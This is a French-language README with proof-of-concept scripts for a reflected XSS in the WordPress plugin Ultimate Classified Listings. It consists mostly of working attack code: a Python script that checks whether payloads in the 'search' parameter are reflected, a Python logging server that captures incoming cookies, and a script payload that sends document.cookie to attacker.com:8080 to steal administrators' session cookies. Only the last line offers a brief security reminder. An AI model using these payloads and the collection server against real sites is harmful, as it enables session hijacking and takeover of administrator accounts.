
Scripts de preuve de concept démontrant un XSS réfléchi dans le plugin WordPress Ultimate Classified Listings et le vol de cookies administrateur via des charges utiles conçues et un serveur de journalisation.
Ce dépôt contient des scripts de Preuve de Concept (PoC) pour diverses vulnérabilités découvertes dans différents plugins WordPress. Ces scripts montrent comment les attaquants peuvent exploiter ces vulnérabilités pour effectuer des actions malveillantes.
Cross-Site Scripting (XSS) Réfléchi dans le plugin Ultimate Classified Listings
Vol de cookies via XSS
Cette PoC montre comment exploiter la vulnérabilité XSS réfléchie dans le plugin Ultimate Classified Listings.
Identifier le paramètre vulnérable :
search dans l'URL http://example.com/classifieds.Créer une URL malveillante :
http://example.com/classifieds?search=<script>alert('XSS')</script>
Exécuter le script PoC :
xss_poc.py et exécutez-le.import requests
# Configuration
target_url = "http://example.com/classifieds" # Changez ceci pour l'URL du site cible
payload = "<script>alert('XSS')</script>" # Charge utile XSS
def trigger_xss():
# Construire l'URL malveillante
malicious_url = f"{target_url}?search={payload}"
# Envoyer une requête GET à l'URL malveillante
response = requests.get(malicious_url)
# Vérifier si la charge utile est reflétée dans la réponse
if payload in response.text:
print("[+] La charge utile XSS est reflétée dans la réponse.")
print("[+] URL malveillante :", malicious_url)
else:
print("[-] La charge utile XSS n'est pas reflétée dans la réponse.")
if __name__ == "__main__":
trigger_xss()
Cette PoC montre comment un attaquant peut exploiter la vulnérabilité XSS réfléchie pour voler les cookies des utilisateurs à privilèges élevés.
Configurer un serveur malveillant :
malicious_server.py et exécutez-le pour démarrer un serveur qui enregistre les requêtes entrantes (y compris les cookies).from http.server import BaseHTTPRequestHandler, HTTPServer
import logging
class RequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
logging.info(f"Requête reçue : {self.headers}")
self.send_response(200)
self.end_headers()
def run(server_class=HTTPServer, handler_class=RequestHandler, port=8080):
logging.basicConfig(filename='server.log', level=logging.INFO)
server_address = ('', port)
httpd = server_class(server_address, handler_class)
logging.info(f'Démarrage du serveur sur le port {port}...')
httpd.serve_forever()
if __name__ == "__main__":
run()
Créer une charge utile pour voler les cookies :
http://example.com/classifieds?search=<script>new Image().src='http://attacker.com:8080?cookie='+document.cookie;</script>
Exécuter le script PoC :
steal_cookies_poc.py et exécutez-le.import requests
# Configuration
target_url = "http://example.com/classifieds" # Changez ceci pour l'URL du site cible
attacker_server = "http://attacker.com:8080" # Changez ceci pour l'URL de votre serveur malveillant
payload = f"<script>new Image().src='{attacker_server}?cookie='+document.cookie;</script>"
def trigger_xss():
# Construire l'URL malveillante
malicious_url = f"{target_url}?search={payload}"
# Envoyer une requête GET à l'URL malveillante
response = requests.get(malicious_url)
# Vérifier si la charge utile est reflétée dans la réponse
if payload in response.text:
print("[+] La charge utile XSS est reflétée dans la réponse.")
print("[+] URL malveillante :", malicious_url)
else:
print("[-] La charge utile XSS n'est pas reflétée dans la réponse.")
if __name__ == "__main__":
trigger_xss()
Ces PoC montrent comment un attaquant pourrait exploiter des vulnérabilités dans des plugins WordPress pour effectuer des actions malveillantes. Gardez toujours vos logiciels à jour et suivez les meilleures pratiques de sécurité pour prévenir de telles vulnérabilités.